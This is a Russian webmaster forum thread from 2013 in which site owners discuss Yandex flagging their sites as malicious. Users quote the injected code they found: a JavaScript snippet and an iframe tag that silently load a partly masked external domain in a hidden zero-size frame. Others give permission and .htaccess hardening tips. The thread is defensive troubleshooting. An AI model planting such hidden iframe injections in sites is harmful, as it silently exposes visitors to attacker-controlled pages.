- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Здравствуйте, уважаемые участники форума!
сегодня 06.08.13 при попытке захода на сайт http://elektri4estwo.ru выдается предупреждение о том, что сайт может угрожать безопасности компьютера. В панели яндекс вебмастер написано следующее:
Результат выборочной проверки
Дата последней проверки 06.08.2013
Страница http://elektri4estwo.ru/osnovi-elektrotehniki/1-peremennii-i-postoyannii-tok.html
Вердикт Поведенческий анализ.
Я проверил все файлы сайта, вирусы отсутствуют. Также обратился с просьбой в службу поддержки хостера, вирусов нет.
1. Подскажите в чем заключается вердикт "поведенческий анализ"?
2. Какой вредоносный код на сайте все таки есть? Повторная проверка яндекс показала что код все еще присутствует. Тех поддержка пока молчит.
3. Подскажите где дырка в сайте? Почитал рекомендации в теме "Общая тема о борьбе с шеллами и вирусами на сайте", когда их применять после удаления вредоносного кода?
Фрейм у вас с вирусом.
---------- Добавлено 06.08.2013 в 18:02 ----------
На 245 +- строчке - это ваш код?
Фрейм у вас с вирусом.
---------- Добавлено 06.08.2013 в 18:02 ----------
а где этот фрейм найти?
На 245 +- строчке - это ваш код?
это код партнерки ред клик
нашел код
var if9KRu = document.createElement('iframe');if9KRu.name = 'if9KRu';if9KRu.src = 'http://*.la*tye.com/';if9KRu.style.width = '0px';if9KRu.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if9KRu=') == -1) {document.cookie = 'if9KRu=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if9KRu);}};
это он?
это код партнерки ред клик
тоже на эту партнерку яша матерился - убрал...
тоже на эту партнерку яша матерился - убрал...
это из-за нее получается. У тебя также был в панели вебмастера "поведенческий анализ"?
кроме удаления партнерки ни как не исправить?
---------- Добавлено 06.08.2013 в 17:10 ----------
TF-Studio, удалил строку с фреймом в папке шаблона. Подскажите есть ли еще вредоносный код?
это из-за нее получается. У тебя также был в панели вебмастера "поведенческий анализ"?
кроме удаления партнерки ни как не исправить?
---------- Добавлено 06.08.2013 в 17:10 ----------
TF-Studio, удалил строку с фреймом в папке шаблона. Подскажите есть ли еще вредоносный код?
после ее удаления все стало хорошо
не подскажите какие права ставить на файлы и папки джумла для предотвращения несанкционированного доступа?
не подскажите какие права ставить на файлы и папки джумла для предотвращения несанкционированного доступа?
вообще рекомендуется, не только на джулу\не джумлу - на папки 755 на файлы 644 (которые используются и выполняются)
вообще рекомендуется, не только на джулу\не джумлу - на папки 755 на файлы 644 (которые используются и выполняются)
спасибо, все также стоят. Можете объяснить как реализовать следующее:
"все директории, в которые производится загрузка файлов или кэширование - делаем read-write и кладем в них волшебный .htaccess, который либо делает
deny from all
либо запрещает вызов php
Options -Indexes
php_flag engine 0
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml "
Такая же фигня сегодня с яндексом.
На сайте только тизеры от adlabs.
Посмотрите сайт xodbox.ru От кода партнерки такая шняга? Почему тогда за полтора года ни разу не было с ней проблем?
у меня тоже такой фрейм(
<iframe name="ifn2i8N" src="http://asnem.listen-it.com/" style="width: 0px; height: 0px;"/>
в папках шаблона я его особо не нашёл. как он мог попасть на сайта? пароли постоянно меняю(параноя), админку врядли могли взломать, так как там фишка есть одна, я бы сразу заметил. может через хостера? хостинг ********.net, на всех сайтах что у них, появились эти говнючие фреймы.
---------- Добавлено 07.08.2013 в 09:20 ----------
хостинг: хостлайф